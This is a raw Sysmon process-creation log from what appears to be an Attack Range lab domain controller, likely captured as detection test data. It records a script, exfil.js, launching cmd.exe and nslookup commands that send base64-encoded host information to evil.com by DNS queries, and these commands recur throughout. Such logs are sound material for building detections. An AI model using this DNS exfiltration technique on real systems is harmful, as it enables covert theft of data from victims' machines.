LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliwyzly.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067805Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:22.290{A8622C2F-5902-6078-1A0E-00000000AE01}1796C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5902-6078-170E-00000000AE01}3868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlanzw.tmp 2>&1 154100x800000000000000067794Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:22.273{A8622C2F-5902-6078-190E-00000000AE01}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:22.261{A8622C2F-5902-6078-170E-00000000AE01}3868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlanzw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067764Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:20.555{A8622C2F-5900-6078-160E-00000000AE01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:19.877{A8622C2F-58FF-6078-150E-00000000AE01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067738Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:19.210{A8622C2F-58FF-6078-140E-00000000AE01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067727Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:17.273{A8622C2F-58FD-6078-130E-00000000AE01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067718Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:16.605{A8622C2F-58FC-6078-120E-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067708Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:16.083{A8622C2F-58FC-6078-110E-00000000AE01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:04.643{A8622C2F-58F0-6078-100E-00000000AE01}4832C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58F0-6078-0E0E-00000000AE01}6136C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrify.tmp 2>&1 154100x800000000000000067641Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:04.613{A8622C2F-58F0-6078-0E0E-00000000AE01}6136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrify.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000067549Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:54.126{A8622C2F-58E6-6078-0C0E-00000000AE01}3500C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58E6-6078-0A0E-00000000AE01}804C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpghwu.tmp 2>&1 154100x800000000000000067538Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:54.095{A8622C2F-58E6-6078-0A0E-00000000AE01}804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpghwu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067517Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:52.176{A8622C2F-58E4-6078-090E-00000000AE01}5804C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58E4-6078-070E-00000000AE01}5200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvdxwq.tmp 2>&1 154100x800000000000000067506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:52.147{A8622C2F-58E4-6078-070E-00000000AE01}5200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvdxwq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:47.065{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BEB231ACF04E40B506403920D4DD795A,SHA256=2548884526E8FBC5781F5B3B2972E9B20CC16DD86BDE93D2E888023F6919F5A2,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{A8622C2F-58C0-6078-F60D-00000000AE01}6444C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000067401Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:34.506{A8622C2F-58D2-6078-050E-00000000AE01}4196C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58D2-6078-030E-00000000AE01}5396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzft.tmp 2>&1 154100x800000000000000067390Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:34.476{A8622C2F-58D2-6078-030E-00000000AE01}5396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzft.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000067350Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:24.940{A8622C2F-58C8-6078-020E-00000000AE01}6336C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\temp\exfil.js"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000067327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:22.269{A8622C2F-58C6-6078-010E-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067319Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:22.081{A8622C2F-58C6-6078-000E-00000000AE01}7128C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58C6-6078-FE0D-00000000AE01}6136C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluim.tmp 2>&1 154100x800000000000000067308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:22.052{A8622C2F-58C6-6078-FE0D-00000000AE01}6136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluim.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:20.559{A8622C2F-58C4-6078-FD0D-00000000AE01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:19.982{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BEB231ACF04E40B506403920D4DD795A,SHA256=2548884526E8FBC5781F5B3B2972E9B20CC16DD86BDE93D2E888023F6919F5A2,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{A8622C2F-58C0-6078-F60D-00000000AE01}6444C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000067261Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:19.882{A8622C2F-58C3-6078-FB0D-00000000AE01}6432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067250Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:19.200{A8622C2F-58C3-6078-FA0D-00000000AE01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067236Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:17.431{A8622C2F-58C1-6078-F90D-00000000AE01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067225Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:16.763{A8622C2F-58C0-6078-F80D-00000000AE01}1028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067200Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:16.616{A8622C2F-58C0-6078-F60D-00000000AE01}6444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd "C:\temp"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000067190Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:16.096{A8622C2F-58C0-6078-F50D-00000000AE01}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067083Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:04.310{A8622C2F-58B4-6078-F40D-00000000AE01}3176C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com 